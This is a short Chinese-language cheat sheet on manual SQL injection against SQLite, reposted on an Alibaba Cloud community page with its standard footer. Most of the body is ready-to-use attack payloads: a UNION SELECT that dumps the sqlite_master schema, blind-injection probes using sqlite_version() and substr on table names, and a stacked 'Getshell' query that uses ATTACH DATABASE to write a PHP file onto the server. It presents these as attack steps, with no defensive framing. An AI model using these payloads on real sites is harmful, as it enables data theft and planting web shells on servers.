SQLite手工注入方法小結

來源:互聯網
上載者:User

標籤:

SQLite 官網下載:www.sqlite.org/download.html

sqlite管理工具:http://www.yunqa.de/delphi/products/sqlitespy/index

 

sqlite_master隱藏表,具體內容如下:

欄位:type/name/tbl_name/rootpage/sql

 

 sqlite注入測試:

 

 1、Union select 查詢

select * from test where id =1 and 1=2 union select name,sql from sqlite_master

 

2、盲注

 

select * from test where id =1 union select 1,length(sqlite_version())=6    //得到sqlite版本位元

select * from test where id =1 and substr(sqlite_version(),1,1)=‘3‘            //得到sqlite版本首位為3

select * from test where id =1 and substr((select name from sqlite_master where type=‘table‘ limit 0,1),1,1)=‘T‘  (大小寫區分,有差別)  //得到sqlite表名第一位為T

 

 3、Getshell

 

select * from test where id =1 ;ATTACH DATABASE ‘C:\\Sqlite\\xiaozi.php‘ AS pwn ; CREATE TABLE pwn.exp (dataz text) ; INSERT INTO pwn.exp (dataz) VALUES (‘ <?php phpinfo(); ?> ‘); --

 

 

參考連結:

Win7下SQLite安裝配置與使用方法詳解:http://www.codeceo.com/article/win7-sqlite-usage.html

Windows下安裝配置SQLite和使用的教程:http://www.weste.net/2014/10-08/99347.html

SQLite手工注入方法小結

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.